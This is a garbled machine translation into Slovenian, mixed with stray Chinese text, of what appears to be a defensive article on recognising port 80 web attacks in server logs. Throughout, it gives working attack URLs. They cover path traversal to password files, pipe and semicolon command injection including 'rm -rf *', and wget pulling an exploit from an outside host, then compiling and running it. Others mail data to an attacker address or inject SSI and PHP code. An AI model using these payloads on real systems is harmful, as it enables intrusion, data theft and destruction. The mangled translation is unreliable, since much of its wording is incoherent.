I. Povzetek
II. Podroben opis
III. Nadaljnji
IV. Prelitja Analiza
V. transcoding
VI. Sklepna ugotovitev
[Povzetek]
Privzeta spletna stran port 80, ki bo na različnih varnostnih problemov še naprej, da jih javnost, čeprav so nekatere od teh ranljivosti lahko napadalec pridobi privileges skrbnika sistema za vstop v mesto sam, naslednje Zenomorph pristanišču 80 napadov na nekatere sledi raziskave, in vam povem, kako najti probleme iz log zapisov.
[Podrobnosti]
Tukaj, v delu z več zaslona Liezi na spletnih strežnikih in uporabi postopkov, na katerih napadu na splošno, in pustila sledi Lie Zi Jin Jin yes tistimi, ki predstavljajo kar napade, in ni seznam vseh obliko napada, ta oddelek bo Podroben opis vloge vsakega napada, in kako izkoristiti te ranljivosti za napad.
(1) "." ".." In "..." zahtevo
Sledovi teh napadov so zelo pogosti za spletne aplikacije in spletni strežnik, ki se uporablja, da se omogoči napadalcu ali črv, virus program za spremembo ujeti pomočnik pot, dostop do zaprtih območij. Večina programov CGI z navedenim pomanjkljivostim, ".." zahtevo.
Primer:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
To kaže na zahtevo napadalca Liezi mosd to datoteko, če napadalec možnost preboja spletni strežnik root direktorij, nato pa dobili več informacij in pridobiti nadaljnje privilegije.
(2) "% 20" zahtevo
20% je hex vrednost, ki 16 prostore, čeprav to ne pomeni, da bi lahko uporabljali vse, toda, ko si ogledate dnevnik bo našel, nekateri spletnega strežnika uporaba tekmovanje v teku na te vrste, ki se lahko učinkovito izvajajo Zato morate pazljivo preberete dnevnik. Po drugi strani pa lahko zahteva, včasih pomaga, da opravljanje nekaterih ukazov.
Primer:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Ta Liezi kaže napadalec za izvršitev unix ukaz, ki navaja celoten katalog zahtevanih dokumentov, zaradi česar napadalec za dostop do pomembnih datotek na vašem sistemu, da bi mu pomagal, da poleg tega določajo pogoje za pridobitev pravice.
(3) "% 00" zahtevo
00% je dejal 16-byte šestnajstiški prazen, mu je uspelo pretentati spletne aplikacije, in zahtevajo različne vrste datotek.
Primeri:
http://host/cgi-bin/lame.cgi?page=index.html
To je lahko veljavno prošnjo v stroj, če napadalec zaveda te zahteve je bila uspešna, bo dodatno iskal CGI postopke.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Morda CGI program ne sprejme te zahteve, ker je zahteva za preverjanje datoteke pripono imena, kot so: html.shtml ali druge vrste datotek. Večina programov bo povedal zahtevala tip datoteke je neveljaven, tokrat bo povedal napadalec zahteva spis mora biti značaj datoteke končnice tipa, da napadalec lahko dobite sistem pot, ime datoteke, ki izhajajo iz vaš sistem bolj občutljive informacije
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Pozornost na to zahtevo, bo goljufija cgi program, da tega dokumenta je določitev sprejemljivih vrst datotek, nekatere aplikacije učinkovite inšpekcijske preglede, kot neumen datoteka zahtevo, ki se pogosto uporablja metode napadalca.
(4) "|" zahtevo
To je cev značaj, v unix sistemu, prošnjo za pomoč pri izvajanju več ukazov sistema hkrati.
Primer:
# Cat access_log | grep-i ".."
(Ta ukaz bo prikazal log v ".." zahtevek, ki se običajno uporabljajo v napadih in črvi izdelkov)
Pogosto ugotovijo, da je veliko spletnih aplikacij uporabo te vrste, tudi to vodi do lažnih alarmov v IDS zapor.
V skrbni preučitvi vaše prošnje, tako da prednost zmanjšanje lažnih alarmov v sisteme za zaznavanje vsiljivcev.
Tukaj je nekaj Lieh-Cu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Ta zahteva ukaz, naslednji so nekatere spremembe v Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Ta zahteva je navedena v sistem Unix / etc imenik vseh datotek
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "šepav"
Ukaz cat izvršitev zahtevo in izvajanja ukaza grep bo tudi, odjaviti "šepav"
(5) ";" zahtevo
V unix sistemih, ta znak omogoča več izvajanja ukazno vrstico
Primer:
# Id, uname-a
(Izvajanje id ukaz, ki ji sledi izvajanje ukaza uname)
Nekateri spletni program s to naravo, lahko povzroči v vašem IDS dnevnikov opozorilo pred neuspehom, morate pozorno preveriti vašo spletno program, tako da boste zmanjšali tveganje za neuspeh razpisov ukrepov IDS.
(6) " " in " " Zahteva
Bi morali preveriti svoje dnevnike zapis dva znaka, več razlogov, prvi je znak, da doda podatke v dokumentu
Primer 1:
# Echo "vaš hax0red h0 h0" / etc / motd (motd zahteva pisne informacije v tem dokumentu)
Napadalec lahko preprosto uporabite zahtevo, kot je zgoraj posegati v vaše spletne strani. Kot je znano RDS izkoriščajo napadalca se pogosto uporablja za spremembo spletne strani.
Primer 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html boste opazili, da je jezik znakov tu, on uporablja tudi " "," " znake, takih napadov ne more povzročiti napadalec za dostop do sistema, je zmedeno, da ljudje mislijo, da je legitimno informacij v spletno stran (ki vodi do ljudi obišče to povezavo za obisk napadalec iz naslova, se ta zahteva encoded v 16 hex znake v obliki, tako da sledi napad ni tako očitna)
(7) "!" Zahteva
Skupni jezik o tem zahtevku znak SS (Server Side Vključuje) I napad, če napadalec je napadalec zmesti uporabnik klikne povezavo, ki, enako kot zgoraj.
Primer:
http://host1/something.php =
Lieh-Cu je napadalec lahko to storite v datoteko na mestu host2 od host1 zdi zgoraj (seveda zahtevajo obiskovalcev na obisk napadalčeva nastavitve. To zahtevo lahko pretvorijo v 16 hex kodiranje masko, je težko najti)
Hkrati pa se lahko ta pristop izvede tudi v spletni ukaz organ stran
Primer:
http://host/something.php =
Lieh-run na oddaljeni sistem "id" zapoved, bo prikazal spletno stran uporabnika id, običajno "nihče" ali "www"
Ta obrazec omogoča tudi vključiti skrite datoteke.
Primer:
http://host/something.php =
Skrite datoteke. Htpasswd ne bodo prikazani, bo Apache zavrne oblikovati tudi pravila za. Ht obrazcu zahtevka, in SSI logo bo bypass takšne omejitve, in pripelje do varnostnih težav
(8) "," Zahteva
Takšni napadi se uporabljajo za poskus oddaljen vstaviti PHP postopki spletne aplikacije, lahko dovoli izvedbo naročil, odvisno od nastavitve strežnika, in drugih dejavnikov pri delu (kot je php nastavljen na varen način)
Primer: http://host/something.php = passthru ("id ");?
V nekaterih enostavno uporabo php, je lahko na spletni strani na daljinskem pravicah uporabnikov sistema, da deluje lokalno ukaz
(9) "" "zahtevo
Ta znak pozneje uporabljala za izvajanje ukazov v perl, znakov v spletne aplikacije se ne uporablja pogosto, tako da če jo vidite v svojem dnevniku, bi morala biti zelo previdni
Primer:
http://host/something.cgi = "id"
Napišite perl cgi v zadevni program bi privedla do izvajanja ukaza id
[Več]
Naslednji oddelek bodo razpravljali več napadalca lahko opravlja ukaz, skupaj s zahtevane dokumente, in če imate oddaljeno izvajanje vrstnem redu napaka, mora preveriti Zenyang najti. Ta del je samo, da vam dobro idejo, in povedal, vaš sistem, kaj se dogaja, napadalci poskusite napad vaš sistem sledi, vendar ne seznama vseh napadalcu, da uporabite ukaze in zahteve.
"/ Bin / ls"
Ta ukaz zahteva celotno pot, v mnogih spletnih 应用 程序 中 so te praznine, če se prijavite na mnogih mestih Zhezhong zahtevo, 很大 možnost obstaja Yuanchengzhixing ukaz 漏洞, vendar ni nujno problem lahko tudi lažni alarm. Še enkrat spomnil, web pisno prošnjo (cgi, asp, php ... itd), je osnova za varnost
Primer:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
To je okno lupine, če je napadalec v postranski ter prost dostop to scenarij v nastavitve strežnika v skladu s pogoji dovoljeno v okno stroj more storiti ničesar, veliko črvov je skozi vrata 80, komunikacija z oddaljenim stroj
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
To je 2 hex datoteke, je problem in / bin / ls, kot, če se prijavite na mnogih mestih Zhezhong zahteve, je mogoče za velike Yuanchengzhixing Minglingloudong, vendar ni nujno problem lahko tudi lažni alarm.
To bo pokazalo, katere del, ki pripada uporabnikov in skupin
Primer:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Ta ukaz lahko brisanje datotek, ne da bi pravilna uporaba je zelo nevaren
Primeri:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget in TFTP" command
Ti ukazi so pogosto napadalca lahko pridobijo dodatne pravice za prenos datotek, wget je unix ukaz v skladu, se lahko uporabijo za prenos umakniti, TFTP je pod poveljstvom UNIX in NT, se uporablja za prenos datoteke. Nekateri IIS črvi raširiše s TFTP kopirati virus na druge gostiteljev
Primeri:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// gostitelja / cgi-bin / bad.cgi? doh = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Cat" zapoved
Ta ukaz se uporablja za ogled vsebine datoteke, ki se uporablja za branje pomembne informacije, kot so nastavitvene datoteke, geslo slik, kreditnih map in dokumentov si lahko zamislite
Primeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh = cat% 20/etc/motd;
"Echo" zapoved
Ta ukaz se uporablja za zapisovanje podatkov v datoteko, kot so "index.html"
Primeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 «fc-# kivija% 20was% 20here"% 20 | 200day.txt% http://host/cgi-bin/bad.cgi?doh=echo% 20 «fc-# kivija% 20was% 20here"% 20 % 200day.txt;
"Ps" zapoved
Seznami splošno tekmovanje v teku proces, povej, da je napadalec oddaljenem gostitelju teče software, da bi dobili kakšno idejo o varnostnih vprašanjih, pridobiti dodatno dovoljenje
Primeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? doh = ps% 20-aux;
"Kill in killall" command
Unix sistemov, da bi ubil ta proces, napadalec lahko uporabite ta ukaz za ustavitev sistemskih storitev in procesov lahko tudi izbrisati sledi napadalcu, nekateri izkoriščajo bo pripravila veliko otrok procesov
Primeri: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200% | http://host/cgi-bin/bad.cgi?doh=kill 20 -9% 200;
"Uname" zapoved
Ta ukaz pove napadalec oddaljenem računalniku ime, že nekaj časa, na tej spletni strani, da bi vedeli, kateri ponudnik internetnih storitev, napadalec, ki se lahko obiskal danes. Uname-normalno zahtevo, se ti zabeleži v log datoteko
Primeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-| http://host/cgi-bin/bad. cgi? doh = uname% 20-;
"Kp, gcc, perl, python, etc ..." zbiranje / razlaga ukaza
Napadalec z wget ali TFTP download izkoriščajo, in uporabo cc, prevajalnik gcc, da zbere te v izvršljiv program, in nadaljnje privilegije dostopa
Primeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Če vidite dnevnike najdemo v "perl" python "Ta navodila so lahko oddaljeni napadalec download perl, python skript, in poskušal dobiti privilegije lokalnih
"Pošta" ukaz
Napadalci pogosto uporabljajo ta ukaz sistema, nekatere pomembne dokumente v lasti napadalca nabiralnik, ampak tudi pripravljena e-mail bombnih napadov se izvajajo
Primeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." in druge ukaze
Unix sistemov, da bi jim omogoči, da spremenite dovoljenja datotek
chown = omogoča nastavitev spisa lastnik chmod = omogoča, da nastavite dovoljenja datotek chgrp = omogoča lastniku, da spremenite pravice skupine o datotekah chsh = dovoljeno spreminjati uporabnikov lupine
Primeri: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd |% http://host/cgi-bin/bad.cgi?doh=chsh 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" file
To je sistem 'parola datoteke, ponavadi v senci off, in ne smejo videti šifrirano geslo, ampak tudi za napad 者, to lahko Zhidaonaxie velja za obiskovalce in 系统 absolutno pot imena, in tako mesto informacije, kot Tong Chang po senci off, tako da bo napadalca običajno glej / etc / shadow datoteko
"/ Etc / master.passwd"
Ta datoteka je sistem BSD geslo datoteka, ki vsebuje šifrirano geslo, datoteko na root račun le samo za branje, in nekaj nekvalificiranih napadalci odprl njegov poskus, da se glasi vsebina notri. "Če spletna stran root privilegije teči, potem je napadalec, lahko beremo vsebino notri, veliko težav na skrbnika sistema bo ena za drugo
"/ Etc / shadow"
Vsebuje geslo samo v šifrirani sistem, preberite na isto root račun in / et / master.passwd skoraj
"/ Etc / motd"
Ko uporabniki se prijavite v sistem Unix, so ti podatki, na "Message of the Day" datoteko, zagotavlja pomembno informacijskega sistema in administrator uporabnikov nekaterih set, uporabnike, ki želijo videti tiste, ki niso, vsebuje tudi podatke izvedenke sistema, napadalec ponavadi vidimo to datoteko, da razumejo, kaj sistem je tekmovanje v teku na napadalca, naslednji korak je, da iskanje za to vrsto sistema, izkoriščajo, in nadaljnji dostop do sistema privilegijev
"/ Etc / hosts"
Dokument IP naslov in informacijske mreže, napadalec lahko izveste več o omrežju sistema nastavitev
"/ Usr / local / apache / conf / httpd.conf"
To je spletni strežnik Apache zunanja podoba pila, lahko napadalec razumeti, kot CGI, SSI in druge informacije so dostopne
"/ Etc / inetd.conf"
To je zunanja podoba pila inetd storitev, napadalec lahko izveste na daljavo stroj, začne te storitve, ali želite uporabljati ovoj za nadzor dostopa, če je ovoj ugotovljeno, teče, napadalec naslednji korak bo preverjal "/ etc / hosts.allow" in "/ etc / hosts.deny", pila, in ki bi utegnile spremeniti nekatere nastavitve, dostop do pravice
". Htpasswd. Htaccess, in. Htgroup"
Te datoteke se običajno uporabljajo v spletno stran za preverjanje pristnosti uporabnika, da bi napadalec ogled teh datotek, in pridobiti uporabniško ime in geslo, je geslo datoteke. Htpasswd encrypted, prebili nekaj preprost postopek dešifriranja, lahko napadalec za dostop do strani zavarovanih območij (običajno uporabnika z enakim uporabniškim imenom in geslom lahko napadalca še obisk drug račun)
"Access_log in error_log"
To so Apache poleno pila pomočnik, napadalci pogosto ogled teh datotek, pogled na te zahteve se zabeležijo, te in druge zahteve za različne kraje
Značilno je, da bo napadalec spremeni te log datoteke, kot so svoje podatke naslov, napadalec prek pristanišča 80 skozi vaš sistem in vaš backup sistem tudi ne deluje, ni druge evidence program sistem evidentiranja statusa, kar bi zaznavanje vdorov postane zelo težko delo
"[Drive-letter]: winntrepairsam._ ali [črke pogona]: winntrepairsam"
Windows NT s sistemskim geslom datoteko, če daljinskega ukaza ni mogoče izvajati, bo napadalci ponavadi zahteva od teh dokumentov, nato pa "l0pht crack" tipa parola treskav orodij za crack, če napadalec poskuša napad upraviteljstvo 'parola pila, če uspešna takrat zakoten stroj bo napadalec dobi nadzor
[] Overflow analizo
V tem članku ne bom rekel preveč o preliva v temo, bom dal, kaj so ti pojavi in sledovi omeniti in posebno skrb, 1 pufer se pogosto napadli s pretvorbo napadalca kodo in ga je težko najti druge načine za doseganje
Tukaj je preprost Lie Zi
Primer: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
To Liezi kaže napadalca na aplikacijo za pošiljanje veliko znakov, da test program buffer overflow, lahko buffer overflow dobiti oddaljeni dovoljenja ukaz državi izvršitve, če je lastnik je setuid in postopke za koren, s pomočjo prelivanja, lahko dobite dostop do celotnega sistema, če ne setuid program všeč, nato pa presežek je samo teče spletni strani je pravic uporabnikov
Tu ne morem povedati vseh okoliščinah, vendar pa bi morale redno preverjati vaše log datoteko, če ta dan nenadoma našel veliko zahtevkov, vendar običajno ne več kot zahtevo, to pomeni, da ste izpostavljeni overflow napade, seveda, lahko tudi Nova mreža črv napada
[Transcoding]
Vsi napadi zgoraj omenjene zahteve, napadalca ponavadi ve, IDS sisteme pogosto mehanski preveri zahtevo, navadno napadalec bo uporabil podatkov o spremembah orodje v spremeniti zahtevane oblike vsebine 16 band, ki izhajajo iz IDS bo prezreti teh zahtev, Mi smo znani CGI ranljivost orodje za skeniranje, da je dober Liezi Whisker. Če si ogledujete Dnevnik časa najti veliko število 16-band in ne nekaj skupnih znakov, nato pa napadalec lahko poskusite uporabiti nekaj načinov za napad vaš sistem
Hiter način je vaše log vložiti zahtevo za teh 16 čarovnica, jo kopirajte v vašem brskalniku, je mogoče browser spremeni v pravo zahtevo in prikaže vsebina zahteve, če ne pogum tvegati, preprostega človeka ASCII, vam lahko pravilno kodo.
[Zaključek]
Ta člen ne more pokriti vseh 80 pristanišč napad, vendar je večina so navedeni več kot splošni napad, in vam povem, kako v ček vaš log datotek, in kako dodati, kot je število pravil IDS, napisati svoj cilj web mora skrbnik sistema zaskrbljen o tem, kaj je dobra ideja ob istem času, upam, da ta članek pomaga na spletni razvijalci spletnih program pisati boljše programe
OF OPOMBA: Če imate pripombe in predloge, prosimo, pošljite e-pošto admin@cgisecurity.com.